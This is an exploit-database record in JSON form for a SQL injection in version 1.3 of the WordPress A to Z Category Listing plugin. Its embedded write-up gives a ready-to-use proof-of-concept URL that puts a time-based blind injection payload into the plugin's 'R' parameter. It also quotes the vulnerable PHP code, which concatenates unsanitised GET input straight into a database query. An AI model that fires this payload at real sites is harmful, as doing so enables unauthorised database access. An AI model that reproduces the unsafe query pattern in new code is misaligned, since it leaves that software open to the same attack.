WordPress A to Z Category Listing plugin <= 1.3 SQL Injection

{"type": "zdt", "lastseen": "2016-04-20T01:46:15", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "WordPress A to Z Category Listing plugin <= 1.3 SQL Injection", "published": "2011-09-08T00:00:00", "href": "http://0day.today/exploit/description/16919", "cvss": {"vector": "NONE", "score": 0}, "description": "Exploit for php platform in category web applications", "hash": "1f5bff4c62e36b0a5fb5a8eef5e0a80bc5d8a92d45475d365f0d2f0c763f07f5", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability\r\n# Date: 2011-09-09\r\n# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)\r\n# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip\r\n# Version: 1.3 (tested)\r\n# Note: magic_quotes has to be turned off\r\n \r\n---\r\nPoC\r\n---\r\nhttp://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20\r\n \r\n---------------\r\nVulnerable code\r\n---------------\r\n$init_letter = $_GET['R'];\r\n$sql = \"select * from \".$table_prefix.\"terms wpt,\".$table_prefix.\"term_taxonomy wptt where wpt.name like '\".$init_letter.\"%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id\";\r\n...\r\n$sql_rec = $wpdb->get_results($sql);\r\n\r\n\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-16919", "sourceHref": "http://0day.today/exploit/16919", "modified": "2011-09-08T00:00:00", "reporter": "Miroslav Stampar", "enchantments": {"vulnersScore": 6.5}}